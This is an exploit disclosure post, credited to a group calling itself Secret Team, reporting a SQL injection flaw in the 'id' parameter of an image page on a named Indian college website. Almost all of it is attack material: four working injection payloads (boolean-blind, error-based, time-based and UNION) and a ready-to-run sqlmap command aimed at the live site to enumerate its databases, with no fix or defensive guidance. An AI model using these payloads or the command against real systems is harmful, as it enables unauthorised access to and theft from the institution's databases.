##############################################################################
# Exploit Title : BMCCA SQL INJECTION VULNERABILITY
# Author  : AtakBey,Secret Team
# Date : 15/09/2019
# Vendor Homepage : bmcca.edu.in
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
##############################################################################
# Exploit :
/all-images.php?id=[SQL Injection]

# Payload :
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=4 AND 3162=3162

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=4 AND (SELECT 7631 FROM(SELECT COUNT(*),CONCAT(0x7170717a71,(SELECT (ELT(7631=7631,1))),0x7176706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=4 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-4658 UNION ALL SELECT NULL,CONCAT(0x7170717a71,0x6c6e4c7a674264444a6f696242687972477a7770565676727a556277515943696d64434c49425467,0x7176706a71)-- nGGC

# SQLMAP Config
sqlmap.py -u "http://bmcca.edu.in/all-images.php?id=4" --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs

##############################################################################
# Thanks : Atakbey,Secretteam.biz